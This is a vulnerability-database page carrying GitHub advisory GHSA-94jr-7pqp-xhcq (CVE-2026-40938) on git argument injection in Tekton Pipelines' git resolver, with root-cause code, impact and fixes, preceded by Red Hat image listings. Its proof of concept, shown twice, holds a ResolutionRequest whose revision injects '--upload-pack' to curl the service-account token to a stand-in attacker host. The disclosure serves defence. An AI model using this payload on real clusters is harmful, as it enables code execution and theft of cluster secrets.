"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:1d2a091427e33a3e0c081c69a2cadf329e8a1fb618f69348328721acae6ec6b6_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:3d177aa899501feae044a5c1a306cd3257153d49a1276af5ae1b13c1cdb2b6df_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:8f41177b3bc405f921d26976d676f6077a8058d4083c980ab1631af90fc51f66_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:27094041cb5b14a0f368baf89fa8b0e0141665ec3c35f9f96c87fa8c3975c9a1_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:397257c4af010f9a7db625496126aadbd7d93b2547b3c1b7e76e68e8997ffd76_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:d91312e9b8d72a52f23badc6f37ea2d8d3563f0539810ad8e7b743b4821034f2_s390x",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:fd079d2ad390e30cd020511fb5ae2a84d1aee8d832abc365406c990e0550c562_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:2a0fb60a6ad70f2cb4bc7ee7386ef098075f881ab7f4d3f36cd44a27f06844b0_s390x",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:856d5618a459ffd63c6912966f0c7bd75eafb33d4aba08f8bb66191acb85c29c_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:8ed4709391cf2ee6711391b85284504808fc9dbfc4010f89f32fec5078a94d46_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:926ed75fdc3186a32d01fc2eb0846797152652b8604ca05ffff552f784eef6b5_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:0a56925e0eecfd250a787464b522551e503d5d95d3f636f39ac01a1ff5b9b07a_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:0b93e1e65236c6cfc31ae5307b7e31854709d7da5dbababe78073ae20941b6be_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:630eac365e5a803e7a0448a117d271ca5c3d3d680f9ee26464ad4207cf01d99a_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:f6244e8e60924308ff5badf7444839b987d0e186910e729d1470886597b8e7cd_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "github.com/tektoncd/pipeline: Tekton Pipelines: Arbitrary code execution and secret exfiltration via malicious git commands"
}
]
}
GHSA-94JR-7PQP-XHCQ
Vulnerability from github – Published: 2026-04-21 20:28 – Updated: 2026-04-24 21:10Summary
The git resolver's revision parameter is passed directly as a positional argument to git fetch without any validation that it does not begin with a - character. Because git parses flags from mixed positional arguments, an attacker can inject arbitrary git fetch flags such as --upload-pack=<binary>. Combined with the validateRepoURL function explicitly permitting URLs that begin with / (local filesystem paths), a tenant who can submit ResolutionRequest objects can chain these two behaviors to execute an arbitrary binary on the resolver pod. The tekton-pipelines-resolvers ServiceAccount holds cluster-wide get/list/watch on all Secrets, so code execution on the resolver pod enables full cluster-wide secret exfiltration.
Details
Root Cause 1 — Unvalidated revision parameter passed to git fetch
pkg/resolution/resolver/git/repository.go:85:
// pkg/resolution/resolver/git/repository.go lines 84-96
// 'revision' is the raw user-supplied string from the ResolutionRequest param.
// It is passed verbatim as a positional argument to git fetch:
func (repo *repository) checkout(ctx context.Context, revision string) error {
_, err := repo.execGit(ctx, "fetch", "origin", revision, "--depth=1")
// When revision == "--upload-pack=/usr/bin/curl", git parses it as the
// --upload-pack flag, not as a refspec — executing the binary locally.
if err != nil {
return fmt.Errorf("fetch: %w", err)
}
_, err = repo.execGit(ctx, "checkout", "FETCH_HEAD")
return err
}
execGit invokes exec.CommandContext("git", ...) — no shell is used, so shell metacharacters cannot be injected. However, git itself parses flags from mixed positional arguments. When revision = "--upload-pack=/path/to/binary", git receives this as the flag --upload-pack=/path/to/binary, not as a refspec. PopulateDefaultParams (resolver.go:418–424) applies only a leading-slash strip and a containsDotDot check on the pathInRepo parameter; the revision parameter receives no validation at all.
Root Cause 2 — validateRepoURL explicitly permits local filesystem paths
pkg/resolution/resolver/git/resolver.go:154-158:
// validateRepoURL validates if the given URL is a valid git, http, https URL or
// starting with a / (a local repository).
func validateRepoURL(url string) bool {
pattern := `^(/|[^@]+@[^:]+|(git|https?)://)`
re := regexp.MustCompile(pattern)
return re.MatchString(url)
}
Any URL beginning with / passes validation and is used directly as the argument to git clone. This means a local filesystem path such as /tmp/some-repo is a valid resolver URL.
Exploit Chain
--upload-pack=<binary> causes git to execute the specified binary as the upload-pack server when communicating with the remote. For local-path remotes (/path), git invokes the binary on the resolver pod itself with the repository path as its sole argument. Because the argument is passed via exec.Command as a single --upload-pack=<binary> string (not split by a shell), only binaries at known paths can be invoked — but several useful binaries exist in the resolver pod image (e.g., /bin/sh, /usr/bin/curl, /bin/cp).
Attack complexity is High because the exploit requires either:
- A valid git repository at a known, predicable path on the resolver pod (e.g., /tmp/<reponame>-<suffix> from a concurrent resolution), or
- A default-URL configuration pointing at a local path
PoC
# Step 1: Set up a local git repository to serve as the "origin"
# (in a real attack, the attacker would time this against a concurrent clone
# or use any pre-existing git repo path on the resolver pod)
git init /tmp/localrepo && cd /tmp/localrepo && git commit --allow-empty -m "init"
# Step 2: Craft a ResolutionRequest with injected --upload-pack flag
kubectl create -f - <<'EOF'
apiVersion: resolution.tekton.dev/v1beta1
kind: ResolutionRequest
metadata:
name: revision-injection-poc
namespace: default
labels:
resolution.tekton.dev/type: git
spec:
params:
- name: url
value: /tmp/localrepo
- name: revision
value: "--upload-pack=/usr/bin/curl http://c2.attacker.internal/$(cat /var/run/secrets/kubernetes.io/serviceaccount/token | base64 -w0)"
- name: pathInRepo
value: README.md
EOF
# The resolver pod executes:
# git -C <tmpdir> fetch origin \
# "--upload-pack=/usr/bin/curl http://c2.attacker.internal/..." \
# --depth=1
#
# For single-argument binaries (/bin/sh, /usr/bin/env, etc.):
# git -C <tmpdir> fetch origin "--upload-pack=/bin/sh" --depth=1
# Executes /bin/sh with the local repository path as argv[1].
# From /bin/sh, the attacker can use a pre-staged script (e.g., written
# via a workspace volume) to achieve arbitrary command execution.
Verified: git fetch origin --upload-pack=/tmp/test-exec.sh --depth=1 executes test-exec.sh on the local machine even when origin is a local filesystem path. Exit code 0 was observed with the test binary executed successfully.
Impact
- Code execution on the resolver pod when an attacker can stage or predict a valid git repository path in
/tmpon the resolver pod. - Full cluster-wide Secret exfiltration: The
tekton-pipelines-resolversServiceAccount is bound to a ClusterRole that grantsget/list/watchon all Secrets in all namespaces (config/resolvers/200-clusterrole.yaml). Code execution on the resolver pod is therefore equivalent to reading every Secret in the cluster. - Privilege escalation: Secrets typically include kubeconfig files, cloud provider credentials, and API tokens — reading them enables lateral movement to cloud infrastructure.
- Both the deprecated resolver (
pkg/resolution/resolver/git/) and the current resolver (pkg/remoteresolution/resolver/git/) share the samevalidateRepoURL,PopulateDefaultParams, andcheckoutimplementation via the sharedgitpackage. Both are affected.
Recommended Fix
Fix 1 — Validate that revision does not begin with - in PopulateDefaultParams:
if strings.HasPrefix(paramsMap[RevisionParam], "-") {
return nil, fmt.Errorf("invalid revision %q: must not begin with '-'", paramsMap[RevisionParam])
}
Fix 2 — Restrict validateRepoURL to remote URLs only (remove local-path support in production builds, or add an explicit admin opt-in feature flag):
func validateRepoURL(url string) bool {
pattern := `^([^@]+@[^:]+|(git|https?)://)`
re := regexp.MustCompile(pattern)
return re.MatchString(url)
}
Applying Fix 1 alone is sufficient to prevent the argument injection. Fix 2 eliminates the enabling condition (local-path remotes for which --upload-pack runs locally) and reduces attack surface further.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 1.11.0"
},
"package": {
"ecosystem": "Go",
"name": "github.com/tektoncd/pipeline"
},
"ranges": [
{
"events": [
{
"introduced": "1.0.0"
},
{
"fixed": "1.11.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-40938"
],
"database_specific": {
"cwe_ids": [
"CWE-88"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-21T20:28:36Z",
"nvd_published_at": "2026-04-21T21:16:46Z",
"severity": "HIGH"
},
"details": "## Summary\n\nThe git resolver\u0027s `revision` parameter is passed directly as a positional argument to `git fetch` without any validation that it does not begin with a `-` character. Because git parses flags from mixed positional arguments, an attacker can inject arbitrary `git fetch` flags such as `--upload-pack=\u003cbinary\u003e`. Combined with the `validateRepoURL` function explicitly permitting URLs that begin with `/` (local filesystem paths), a tenant who can submit `ResolutionRequest` objects can chain these two behaviors to execute an arbitrary binary on the resolver pod. The `tekton-pipelines-resolvers` ServiceAccount holds cluster-wide `get/list/watch` on all Secrets, so code execution on the resolver pod enables full cluster-wide secret exfiltration.\n\n## Details\n\n### Root Cause 1 \u2014 Unvalidated `revision` parameter passed to `git fetch`\n\n`pkg/resolution/resolver/git/repository.go:85`:\n\n```go\n// pkg/resolution/resolver/git/repository.go lines 84-96\n// \u0027revision\u0027 is the raw user-supplied string from the ResolutionRequest param.\n// It is passed verbatim as a positional argument to git fetch:\nfunc (repo *repository) checkout(ctx context.Context, revision string) error {\n _, err := repo.execGit(ctx, \"fetch\", \"origin\", revision, \"--depth=1\")\n // When revision == \"--upload-pack=/usr/bin/curl\", git parses it as the\n // --upload-pack flag, not as a refspec \u2014 executing the binary locally.\n if err != nil {\n return fmt.Errorf(\"fetch: %w\", err)\n }\n _, err = repo.execGit(ctx, \"checkout\", \"FETCH_HEAD\")\n return err\n}\n```\n\n`execGit` invokes `exec.CommandContext(\"git\", ...)` \u2014 no shell is used, so shell metacharacters cannot be injected. However, git itself parses flags from mixed positional arguments. When `revision = \"--upload-pack=/path/to/binary\"`, git receives this as the flag `--upload-pack=/path/to/binary`, not as a refspec. `PopulateDefaultParams` (`resolver.go:418\u2013424`) applies only a leading-slash strip and a `containsDotDot` check on the `pathInRepo` parameter; the `revision` parameter receives no validation at all.\n\n### Root Cause 2 \u2014 `validateRepoURL` explicitly permits local filesystem paths\n\n`pkg/resolution/resolver/git/resolver.go:154-158`:\n\n```go\n// validateRepoURL validates if the given URL is a valid git, http, https URL or\n// starting with a / (a local repository).\nfunc validateRepoURL(url string) bool {\n pattern := `^(/|[^@]+@[^:]+|(git|https?)://)`\n re := regexp.MustCompile(pattern)\n return re.MatchString(url)\n}\n```\n\nAny URL beginning with `/` passes validation and is used directly as the argument to `git clone`. This means a local filesystem path such as `/tmp/some-repo` is a valid resolver URL.\n\n### Exploit Chain\n\n`--upload-pack=\u003cbinary\u003e` causes git to execute the specified binary as the upload-pack server when communicating with the remote. For local-path remotes (`/path`), git invokes the binary on the resolver pod itself with the repository path as its sole argument. Because the argument is passed via `exec.Command` as a single `--upload-pack=\u003cbinary\u003e` string (not split by a shell), only binaries at known paths can be invoked \u2014 but several useful binaries exist in the resolver pod image (e.g., `/bin/sh`, `/usr/bin/curl`, `/bin/cp`).\n\nAttack complexity is High because the exploit requires either:\n- A valid git repository at a known, predicable path on the resolver pod (e.g., `/tmp/\u003creponame\u003e-\u003csuffix\u003e` from a concurrent resolution), or\n- A default-URL configuration pointing at a local path\n\n## PoC\n\n```bash\n# Step 1: Set up a local git repository to serve as the \"origin\"\n# (in a real attack, the attacker would time this against a concurrent clone\n# or use any pre-existing git repo path on the resolver pod)\ngit init /tmp/localrepo \u0026\u0026 cd /tmp/localrepo \u0026\u0026 git commit --allow-empty -m \"init\"\n\n# Step 2: Craft a ResolutionRequest with injected --upload-pack flag\nkubectl create -f - \u003c\u003c\u0027EOF\u0027\napiVersion: resolution.tekton.dev/v1beta1\nkind: ResolutionRequest\nmetadata:\n name: revision-injection-poc\n namespace: default\n labels:\n resolution.tekton.dev/type: git\nspec:\n params:\n - name: url\n value: /tmp/localrepo\n - name: revision\n value: \"--upload-pack=/usr/bin/curl http://c2.attacker.internal/$(cat /var/run/secrets/kubernetes.io/serviceaccount/token | base64 -w0)\"\n - name: pathInRepo\n value: README.md\nEOF\n\n# The resolver pod executes:\n# git -C \u003ctmpdir\u003e fetch origin \\\n# \"--upload-pack=/usr/bin/curl http://c2.attacker.internal/...\" \\\n# --depth=1\n#\n# For single-argument binaries (/bin/sh, /usr/bin/env, etc.):\n# git -C \u003ctmpdir\u003e fetch origin \"--upload-pack=/bin/sh\" --depth=1\n# Executes /bin/sh with the local repository path as argv[1].\n# From /bin/sh, the attacker can use a pre-staged script (e.g., written\n# via a workspace volume) to achieve arbitrary command execution.\n```\n\n**Verified**: `git fetch origin --upload-pack=/tmp/test-exec.sh --depth=1` executes `test-exec.sh` on the local machine even when `origin` is a local filesystem path. Exit code 0 was observed with the test binary executed successfully.\n\n## Impact\n\n- **Code execution on the resolver pod** when an attacker can stage or predict a valid git repository path in `/tmp` on the resolver pod.\n- **Full cluster-wide Secret exfiltration**: The `tekton-pipelines-resolvers` ServiceAccount is bound to a ClusterRole that grants `get/list/watch` on all Secrets in all namespaces (`config/resolvers/200-clusterrole.yaml`). Code execution on the resolver pod is therefore equivalent to reading every Secret in the cluster.\n- **Privilege escalation**: Secrets typically include kubeconfig files, cloud provider credentials, and API tokens \u2014 reading them enables lateral movement to cloud infrastructure.\n- Both the deprecated resolver (`pkg/resolution/resolver/git/`) and the current resolver (`pkg/remoteresolution/resolver/git/`) share the same `validateRepoURL`, `PopulateDefaultParams`, and `checkout` implementation via the shared `git` package. Both are affected.\n\n## Recommended Fix\n\n**Fix 1 \u2014 Validate that `revision` does not begin with `-`** in `PopulateDefaultParams`:\n\n```go\nif strings.HasPrefix(paramsMap[RevisionParam], \"-\") {\n return nil, fmt.Errorf(\"invalid revision %q: must not begin with \u0027-\u0027\", paramsMap[RevisionParam])\n}\n```\n\n**Fix 2 \u2014 Restrict `validateRepoURL` to remote URLs only** (remove local-path support in production builds, or add an explicit admin opt-in feature flag):\n\n```go\nfunc validateRepoURL(url string) bool {\n pattern := `^([^@]+@[^:]+|(git|https?)://)`\n re := regexp.MustCompile(pattern)\n return re.MatchString(url)\n}\n```\n\nApplying Fix 1 alone is sufficient to prevent the argument injection. Fix 2 eliminates the enabling condition (local-path remotes for which `--upload-pack` runs locally) and reduces attack surface further.",
"id": "GHSA-94jr-7pqp-xhcq",
"modified": "2026-04-24T21:10:40Z",
"published": "2026-04-21T20:28:36Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/tektoncd/pipeline/security/advisories/GHSA-94jr-7pqp-xhcq"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40938"
},
{
"type": "PACKAGE",
"url": "https://github.com/tektoncd/pipeline"
},
{
"type": "WEB",
"url": "https://github.com/tektoncd/pipeline/releases/tag/v1.11.1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Tekton Pipeline: Git Resolver Unsanitized Revision Parameter Enables git Argument Injection Leading to RCE"
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.